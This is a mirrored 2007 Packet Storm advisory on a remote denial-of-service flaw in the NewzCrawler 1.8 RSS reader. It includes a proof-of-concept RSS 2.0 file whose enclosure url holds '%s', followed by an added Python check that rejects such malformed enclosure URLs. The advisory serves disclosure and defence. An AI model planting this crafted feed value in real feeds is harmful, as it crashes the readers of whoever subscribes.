newzcrawler-dos.txt

16 May 2007 00:00:00 | Reported by: gbr | Type: packetstorm | Source: packetstormsecurity.com

NewzCrawler 1.8 Remote DoS via 'enclosure' sub-element in RSS 2.0 fil


Code
`NewzCrawler 1.8 Remote Denial of Service  
Credits: gbr  
Tested on Windows XP SP2  
  
NewzCrawler 1.8 becomes unstable and begins to crash when parsing the 'url' attribute of an  
'enclosure' sub-element that contains certain invalid strings*, at the time a new item of an  
RSS 2.0 file is shown.  
  
* '%s', '%Y', '%%', 'n,', and others.  
  
PoC:  
  
<?xml version="1.0"?>  
<rss version="2.0">  
  
<channel>  
<title>Test</title>  
<link></link>  
<description></description>  
  
<item>  
<title>Remote DoS PoC</title>  
<enclosure url="%s"/>  
</item>  
</channel>  
</rss>  
  
  
`
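
A feed-side check for the condition described above, as an added example (not part of the original advisory or of NewzCrawler): it flags RSS 2.0 `enclosure` `url` values that contain a `%` outside a valid `%XX` escape or that are not absolute URLs, so such items can be dropped before a reader parses them. The function names, the accepted schemes and the sample feed are assumptions constructed here.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# A '%' is only valid as the start of a %XX escape; '%s', '%Y' and '%%' are not.
BAD_PERCENT = re.compile(r"%(?![0-9A-Fa-f]{2})")
ALLOWED_SCHEMES = ("http", "https", "ftp")  # assumption: schemes a reader should accept

# Constructed sample feed: one well-formed enclosure, two malformed ones.
SAMPLE_FEED = """<rss version="2.0"><channel><title>Test</title>
<item><title>ok</title><enclosure url="http://example.com/a%20b.mp3"/></item>
<item><title>stray</title><enclosure url="%s"/></item>
<item><title>escape</title><enclosure url="http://example.com/%Y.mp3"/></item>
</channel></rss>"""

def check_enclosure_url(url):
    """Return the reasons (possibly none) why this url attribute should be rejected."""
    reasons = []
    if BAD_PERCENT.search(url):
        reasons.append("stray '%' (not a %XX escape)")
    try:
        parts = urlsplit(url)
        absolute = parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)
    except ValueError:  # e.g. malformed bracketed host
        absolute = False
    if not absolute:
        reasons.append("not an absolute URL with an allowed scheme")
    if any(c <= " " for c in url):
        reasons.append("whitespace or control character")
    return reasons

def scan_feed(xml_text):
    """Return (item title, url, reasons) for each rejected enclosure in the feed."""
    # Stdlib parser keeps the example self-contained; use a hardened XML
    # parser when the feed itself is untrusted.
    root = ET.fromstring(xml_text)
    findings = []
    for item in root.iter("item"):
        title = item.findtext("title", default="")
        for enclosure in item.findall("enclosure"):
            url = enclosure.get("url", "")
            reasons = check_enclosure_url(url)
            if reasons:
                findings.append((title, url, reasons))
    return findings

if __name__ == "__main__":
    for title, url, reasons in scan_feed(SAMPLE_FEED):
        print(f"{title!r}: {url!r} rejected: {'; '.join(reasons)}")
```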

Vulners AI Score: 7.4 (High risk)